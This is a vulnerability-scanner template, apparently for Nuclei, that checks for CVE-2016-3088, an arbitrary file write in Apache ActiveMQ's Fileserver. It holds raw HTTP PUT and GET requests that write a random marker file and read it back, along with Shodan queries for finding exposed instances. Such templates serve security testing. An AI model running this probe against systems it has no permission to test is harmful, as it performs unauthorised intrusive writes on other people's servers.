id: CVE-2016-3088 info: name: Apache ActiveMQ Fileserver - Arbitrary File Write author: fq_hsu severity: critical description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application. impact: | An attacker can write arbitrary files on the server, potentially leading to remote code execution. remediation: | Upgrade to Apache ActiveMQ version 5.14.0 or later to fix the vulnerability. reference: - https://www.exploit-db.com/exploits/40857 - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30 - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt - https://nvd.nist.gov/vuln/detail/CVE-2016-3088 - http://rhn.redhat.com/errata/RHSA-2016-2036.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 epss-percentile: 0.98478 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: apache product: activemq shodan-query: - cpe:"cpe:2.3:a:apache:activemq" - product:"activemq openwire transport" tags: cve2016,cve,fileupload,kev,edb,apache,activemq,intrusive variables: rand1: '{{rand_int(11111111, 99999999)}}' http: - raw: - | PUT /fileserver/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} {{rand1}} - | GET /fileserver/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code_1==204" - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and # digest: 4a0a00473045022100bf71dfa43973a168508db9de8e123853306c617b25b2d8b76575042c5d8071a9022004dbec1f986db202f8678ebd43e6e7c5d04be5dc379324109cdd7b7a52ed0928:922c64590222798bb761d5b6d8e72950